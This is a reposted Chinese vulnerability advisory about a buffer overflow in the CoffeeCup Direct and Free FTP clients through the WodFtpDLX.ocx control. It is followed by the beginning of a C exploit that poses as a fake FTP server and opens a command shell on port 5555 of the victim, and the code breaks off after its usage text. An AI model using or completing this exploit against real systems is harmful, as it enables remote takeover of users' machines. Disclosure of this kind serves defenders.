CoffeeCup FTP客户端远程缓冲区溢出漏洞
2008-04-09 04:22:01来源:互联网 阅读 ()
发布日期:2004-11-22
更新日期:2004-11-23
受影响系统:
CoffeeCup Software CoffeeCup Direct FTP 6.2.0.62描述:
CoffeeCup Software CoffeeCup Free FTP 3.0.0.10
CoffeeCup FTP是Windows操作系统下的客户端。
CoffeeCup FTP使用的插件存在问题,远程攻击者可以利用这个漏洞对服务程序进行缓冲区溢出攻击,可能以进程权限执行任意指令。
CoffeeCup FTP使用的"WeOnlyDo! COM Ftp DELUXE" ActiveX控件来与FTP服务程序通信,由于此插件(WodFtpDLX.ocx)不正确处理FTP服务器发送的超长文件名数据,可导致发生缓冲区溢出,精心构建文件名数据可能以进程权限执行任意指令。
<*来源:Komrade (unsecure@altervista.org)
链接:http://unsecure.altervista.org/security/coffeecup.htm
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*******************************************************************************************************
CoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit
created by Komrade
e-mail: unsecure(at)altervista(dot)org
web: http://unsecure.altervista.org
Tested on:
CoffeeCup Direct FTP 6.2.0.62
CoffeeCup Free FTP 3.0.0.10
on a Windows XP Professional sp2 operating system.
This exploit creates a fake FTP server on your machine, waiting for the
connection of an FTP client.
After the exploit is sent a shell (command prompt) is spawn on port 5555
of the target machine.
This exploit works locally or remotely.
Usage: coffecupbof [direct | free] [-l] [-r server IP]
Options:
direct | free "direct" to exploit a CoffeeCup Direct FTP client
"free" to exploit a CoffeeCup Free FTP client
-l executed locally
-r serverIP executed remotely. You need to specify the address
of the FTP server for the PASV command (Insert your IP address)
Examples:
C:\> coffeecupbof direct -l exploit for CoffeeCup Direct FTP executed locally
C:\> coffeecupbof free -r 10.0.0.1 exploit for CoffeeCup Free FTP executed remotely
*******************************************************************************************************/
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>
#define FTP_PORT 21
#define PASV_PORT 1106
int version, wait = TRUE;
DWORD WINAPI fileList(LPVOID data);
int main(int argc,char **argv){
SOCKET sock, client;
struct sockaddr_in sock_addr,client_addr;
WSADATA data;
WORD p;
char mess[4096], received[512], addr[32];
int lun, n, i, err;
HANDLE fileListH;
DWORD fileListId, exitCode;
p = MAKEWORD(2, 0);
WSAStartup(p, &data);
printf("------------------------------------------------------------------------------\r\n");
printf("\tCoffeeCup FTP Clients Buffer Overflow Vulnerability Exploit\r\n");
printf("\t\t\tcreated by Komrade\r\n\r\n");
printf("\t\te-mail: unsecure(at)altervista(dot)org\r\n");
printf("\t\tweb: http://unsecure.altervista.org\r\n");
printf("------------------------------------------------------------------------------\r\n\r\n");
if (((argc != 2) || (strcmp(argv[1], "direct") != 0) || (strcmp(argv[1], "free") != 0)) && ((argc != 3) || (strcmp(argv[2], "-l") != 0)) && ((argc != 4) || (strcmp(argv[2], "-r") != 0))){
printf("Usage: coffecupbof [direct | free] [-l] [-r server IP]\r\n\r\n");
printf("Options:\r\n");
printf(" direct | free\t\"direct\" to exploit a CoffeeCup Direct FTP client\r\n");
printf(" \t\t\"free\" to exploit a CoffeeCup Free FTP client\r\n");
printf(" -l\t\tworks locally.\r\n");
printf(" -r server IP\tworks remotely. You need to specify the address of the\r\n");
printf("\t\tFTP server for the PASV command (Insert your IP address)\r\n\r\n");
printf("Examples:\r\n");
printf(" coffeecupbof direct -l\t\texploit for CoffeeCup Direct FTP\r\n\t\t\t\texecuted locally\r\n");
标签:
版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有
IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设
网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源
网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护
软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷
网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash
